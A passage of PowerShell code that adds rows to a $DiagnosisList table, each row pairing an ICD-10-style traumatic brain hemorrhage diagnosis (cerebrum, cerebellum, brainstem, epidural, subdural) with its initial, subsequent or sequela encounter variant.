$DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of left cerebrum with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Traumatic hemorrhage of left cerebrum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Traumatic hemorrhage of left cerebrum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of unspecified duration","Traumatic hemorrhage of left cerebrum with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of unspecified duration","Traumatic hemorrhage of left cerebrum with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of unspecified duration","Traumatic hemorrhage of left cerebrum with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, without loss of consciousness","Traumatic hemorrhage of cerebrum, unspecified, without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, without loss of consciousness","Traumatic hemorrhage of cerebrum, unspecified, without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, without loss of consciousness","Traumatic hemorrhage of cerebrum, unspecified, without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 1 hours to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 1 hours to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 1 hours to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of unspecified duration","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of unspecified duration","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of unspecified duration","Traumatic hemorrhage of cerebrum, unspecified, with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum without loss of consciousness","Contusion, laceration, and hemorrhage of cerebellum without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum without loss of consciousness","Contusion, laceration, and hemorrhage of cerebellum without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum without loss of consciousness","Contusion, laceration, and hemorrhage of cerebellum without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 30 minutes or less","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 30 minutes or less","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 30 minutes or less","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 31 minutes to 59 minutes","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 31 minutes to 59 minutes","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 31 minutes to 59 minutes","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 6 hours to 24 hours","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 6 hours to 24 hours","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 6 hours to 24 hours","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of unspecified duration","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of unspecified duration","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of unspecified duration","Contusion, laceration, and hemorrhage of cerebellum with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem without loss of consciousness","Contusion, laceration, and hemorrhage of brainstem without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem without loss of consciousness","Contusion, laceration, and hemorrhage of brainstem without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem without loss of consciousness","Contusion, laceration, and hemorrhage of brainstem without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 30 minutes or less","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 30 minutes or less","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 30 minutes or less","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 31 minutes to 59 minutes","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 31 minutes to 59 minutes","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 31 minutes to 59 minutes","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 6 hours to 24 hours","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 6 hours to 24 hours","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 6 hours to 24 hours","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of unspecified duration","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of unspecified duration","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of unspecified duration","Contusion, laceration, and hemorrhage of brainstem with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage without loss of consciousness","Epidural hemorrhage without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage without loss of consciousness","Epidural hemorrhage without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage without loss of consciousness","Epidural hemorrhage without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 30 minutes or less","Epidural hemorrhage with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 30 minutes or less","Epidural hemorrhage with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 30 minutes or less","Epidural hemorrhage with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Epidural hemorrhage with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Epidural hemorrhage with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Epidural hemorrhage with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Epidural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Epidural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Epidural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 6 hours to 24 hours","Epidural hemorrhage with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 6 hours to 24 hours","Epidural hemorrhage with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of 6 hours to 24 hours","Epidural hemorrhage with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Epidural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Epidural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Epidural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Epidural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Epidural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Epidural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Epidural hemorrhage with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of any duration with death due to other causes prior to regaining consciousness","Epidural hemorrhage with loss of consciousness of any duration with death due to other causes prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of unspecified duration","Epidural hemorrhage with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of unspecified duration","Epidural hemorrhage with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Epidural hemorrhage with loss of consciousness of unspecified duration","Epidural hemorrhage with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage without loss of consciousness","Traumatic subdural hemorrhage without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage without loss of consciousness","Traumatic subdural hemorrhage without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage without loss of consciousness","Traumatic subdural hemorrhage without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 30 minutes or less","Traumatic subdural hemorrhage with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 30 minutes or less","Traumatic subdural hemorrhage with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 30 minutes or less","Traumatic subdural hemorrhage with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Traumatic subdural hemorrhage with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Traumatic subdural hemorrhage with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Traumatic subdural hemorrhage with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic subdural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic subdural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic subdural hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 6 hours to 24 hours","Traumatic subdural hemorrhage with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 6 hours to 24 hours","Traumatic subdural hemorrhage with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of 6 hours to 24 hours","Traumatic subdural hemorrhage with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic subdural hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of any duration with death due to brain injury before regaining consciousness","Traumatic subdural hemorrhage with loss of consciousness of any duration with death due to brain 